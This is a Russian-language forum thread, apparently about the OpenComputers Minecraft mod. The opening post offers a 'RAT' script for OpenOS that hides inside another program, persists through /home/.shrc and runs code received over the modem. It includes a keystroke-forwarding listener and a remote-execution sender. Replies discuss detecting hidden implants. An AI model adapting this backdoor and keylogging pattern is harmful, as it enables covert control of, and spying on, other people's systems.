Перейти к содержимому
Oleshe

RAT Программа-вирус

Рекомендуемые сообщения

Этот скрипт позволяет выполнять код без ведома владельца. Оно выполняет их в фоне. Нужно ручная настройка. Именно:

У нас есть 3 переменные которые нужно будет изменять вам ведь вам лучше решать где и что будет, переменные:
NOWPATH - Там откуда запускается скрипт. Я не знаю как сделать так что-бы оно само определяло так-что можете там строчку помочь.
YOURPATH - Конечный файл, то где будет лежать скрипт.
STARTLINE - Откуда начинать копирование, снос строк. Сделано для того что-бы можно было нормальной программой прикрыть нашу.

Автозапуск скрипта записывается в /home/.shrc.

Что прописать для того что-бы оно выполнено:

modem.broadcast(200,'execute','print("Hello World"')

Имейте в виду что компьютеру нужно время для выполнений ваших программ, любую прогу советую пихать в "многопоточность" или хотя-бы в event.listen.

Пример: 

Скрытый текст

require('event').listen('key_down',function(...)
  require('component').modem.broadcast(200,...)
end)

 

Будет "тревожить" нас по каждому нажатию клавиши.

Так-же я сделал простенький экзекутер:

Скрытый текст

local cmp = require('component')
local modem = cmp.modem
modem.open(200)
local args = {...}
if require('filesystem').exists(args[1]) then
  local handle = io.open(args[1])
  modem.broadcast(200,'execute',handle:read(math.huge))
  handle:close()
else
  print('File does not exists')
end

 Юсаге:

executer_file_name file_name

Пока только для OpenOS. Сделано оно максимально безпалевно, но .shrc палит. Пока не знаю что с этим сделать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

А насколько сложно найти RAT на своем компудахтере?

Предлагаю провести исследование и разработать методы сокрытия кода на компе ОС

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
3 часа назад, hohserg сказал:

А насколько сложно найти RAT на своем компудахтере?

Насколько я понял из мутного описания, RAT не является вирусом. Это лишь способ спрятать произвольный код в одном из файлов. Он может как являться вирусом, так и не быть им.

 

Сложность обнаружения модификации всецело зависит от конкретного кода. Если внедрённый код перехватывает системные вызовы, то его обнаружение может стать практически невозможным в скомпрометированной системе. С другой стороны, проверка скомпрометированных носителей на чистой системе способна однозначно обнаружить любую модификацию. Это если говорить о чисто системных файлах.

 

Найти же зловредный участок кода в пользовательских программах и библиотеках, не имея эталона файлов, вряд ли возможно, т.к. эталон зачастую  отсутствует. Максимум, можно формировать эталон динамически для каждого отдельно взятого компьютера или группы компьютеров. Но сложность тут снова в том, что проверку на соответствие эталону имеет смысл проводить лишь на гарантированно чистой системе.

 

3 часа назад, hohserg сказал:

Предлагаю провести исследование и разработать методы сокрытия кода на компе ОС

В любом случае я предпочитаю считать скомпрометированным любой компьютер, на котором кто-либо мог запускать произвольный код или извлекать компоненты в моё отсутствие. Все носители такого компьютера следует тестировать в гарантированно чистой среде.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в тему...

×   Вы вставили отформатированное содержимое.   Удалить форматирование

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.


×
×
  • Создать...